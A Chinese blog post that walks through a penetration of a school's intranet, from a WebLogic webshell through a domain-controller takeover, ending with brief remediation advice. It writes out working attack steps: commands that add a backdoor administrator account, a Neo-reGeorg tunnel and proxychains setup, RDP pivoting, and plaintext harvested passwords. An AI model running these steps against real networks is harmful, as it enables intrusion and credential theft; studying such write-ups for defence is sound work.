XX单位内网渗透高开低走

admin 2024年11月21日14:27:45评论18 views字数 1772阅读5分54秒阅读模式

 

0x01 本次靶标

资产所属单位 :XX市XX学校

资产简称 :     XX学校

单位地理位置 :XX省XX区XX路88号

联系方式 :    666666

漏洞url :      http://XXXX:8001/

学校官网 :    http://www.XXX.com

0x02 外围打点

打点姿势:搜索其官网下的资产探测存在Weblogic资产且存在漏洞,上传冰蝎的木马且GetShell....

总结:打点玩的就是信息收集能力!!!

#目标地址http://X.X.X.X:8001/#WebShell地址http://X.X.X.X:8001//wls-wsat/4pts.jsp

XX单位内网渗透高开低走

XX单位内网渗透高开低走

拿到webshell之后就开始收集主机上的信息方便进行内网渗透

X.X.X.X  XX省XX市 移动#信息收集whoami      //serveradministratorhostname    //SERVERtasklist /svc //火绒---》 没卵用net user hacker admi /add    net localgroup administrators hacker /add  net group /domain 无法连接到域控进行查询ipconfig /all  //10.10.180.8   10.10.180.10   10.10.180.11  svr.com(无法通信)ping svr.com  //无法ping通域控主机

0x04 内网渗透

上传Fscan至隐藏目录下并上传上线CS马抓取其明文密码....

#抓取的明文密码username:Administratorpassword:manager!@#123username:CLIUSRpassword:)+z|;!{V$VlcG6#Fscan扫描信息10.10.180.3  //linux主机10.10.180.7  //Win主机+hostname:DC2 怀疑是域控10.10.180.9  //Win主机+hostname:HGSERVER2http://10.10.1.1:9002/  //windows主机且存在Weblogic反序列化漏洞

XX单位内网渗透高开低走

这里我们整理下思路....上传Neo-Regorg搭建其通信隧道....

兄弟们重点来了,给我学!!!

目前我们已经拿下边界主机的网站后门与系统后门,其系统后门需要进一步做远程桌面连接进行验证;目前为域环境其目标是要拿下域控!尝试以下思路:

1、在WebShell中观察存在Administrator.HGSRV用户家目录,可窃取会话令牌仿冒身份操作;但上次登陆时间久远!(2021年)

2、尝试对其内网的10.10.180.67的Weblogic服务进行WEB攻击并在本地Kali连接其Shell进行下一步操作...

3、尝试PTH攻击如成功则信息收集接远程桌面....直到碰到域管理员账户踪影在进行后续的攻击利用(推荐)

4、直接收集域控信息,尝试域提权的漏洞,属于无脑莽就完事....(不推荐)

内网隧道

#Neo-Regeorg 3.8.1http://X.X.X.X:8001//wls-wsat/t0l.jsp   123#proxychains配置vi vi /etc/proxychains4.confsocks5 127.0.0.1 1080#proxychains测试proxychains curl http://myip.ipip.net/

XX单位内网渗透高开低走

XX单位内网渗透高开低走

配置好代理后执行以下命令登陆到边界主机的远程桌面...

#连接命令proxychains rdesktop 10.10.180.8#用户备注username:Administratorpassword:manager!@#123

XX单位内网渗透高开低走

在其边界主机系统中查看文件时发现磁盘空间较大且在服务器管理上显示做了存储池...

XX单位内网渗透高开低走

在存储池的F盘发现以下资料....并在资料中发现部署整个Windows集群的角色与账号密码及详细配置等信息....啊就离谱....

XX单位内网渗透高开低走

XX单位内网渗透高开低走

此时我们直接以边界主机为跳板对内部网络的主机进行桌面连接即可....至此拿下域控!!!

XX单位内网渗透高开低走

XX单位内网渗透高开低走

XX单位内网渗透高开低走

XX单位内网渗透高开低走

0x05 漏洞修复

  • 升级Weblogic中间件并安装安装补丁
  • 升级安全防护软件并设置修改密码锁
  • 修改Hyper-V虚拟化程序至单台主机

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月21日14:27:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   XX单位内网渗透高开低走https://cn-sec.com/archives/1722921.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息